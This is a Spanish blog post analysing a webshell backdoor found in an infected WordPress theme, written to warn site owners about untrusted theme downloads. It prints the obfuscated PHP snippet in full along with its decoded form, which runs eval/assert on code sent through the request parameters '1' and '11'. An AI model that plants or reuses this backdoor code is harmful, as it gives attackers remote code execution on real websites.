webshell en el tema de WordPress

Y nuevamente cayó en mis manos un tema de wordpress infectado con scripts maliciosos. Además, este tema de WordPress vivía normalmente en el sitio de un amigo hasta que actualizaron php a la última versión, donde el script malicioso dejó de funcionar y se delató. Desafortunadamente, el antivirus ClamAV incorporado no detectó este script. Otros antivirus detectan infectados como Trojan.Script.1006652 , Trojan.Script.DF5C3C , PHP.Shell.597 , PHP/WebShell.FX!tr

Esta puerta trasera es solo un fragmento de código al comienzo de algunos archivos php de temas, que en todos los sentidos intenta encriptar el nombre de la función «afirmar» utilizada por php para ejecutar código arbitrario. Eliminarlo no es difícil: solo necesita cortar el código malicioso, pero es más difícil de detectar. Se parece a esto:

<?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);$_=$_fF("",$_cC);@$_();?><?php $a=substr_replace("axxxert","ss",1,3);$a($_POST['1']);?><?php $a = chr(92+5);$b = chr(ord($a)+18);$c = chr(ord($b)-14);$d = chr(ord($c)+13);$e = chr(ord($d)+2);$f = $a.$b.$b.$c.$d.$e;forward_static_call_array($f, array($_REQUEST['11']));?><?php

Esto se decodifica en el siguiente código:

eval($_POST['1']);
assert($_POST['1']);
forward_static_call_array(assert, array($_REQUEST['11']));

Su esencia es que simplemente espera una solicitud GET o POST con el parámetro «1» o «11» y ejecuta el código que se pasa allí. Es decir, en ausencia de un comando externo, el código no se manifiesta de ninguna manera y no hace nada, pero cuando un botnet que envía regularmente comandos de prueba encuentra su sitio, puede convertirse fácilmente en parte de él.

Por lo tanto, vale la pena recordar a aquellos a quienes les gusta instalar temas de WordPress de tiendas o colecciones de temas de WordPress en diferentes sitios: esta es una forma muy probable de infectar un sitio desde el momento en que se creó.

Deja un comentario

Tu dirección de correo electrónico no será publicada.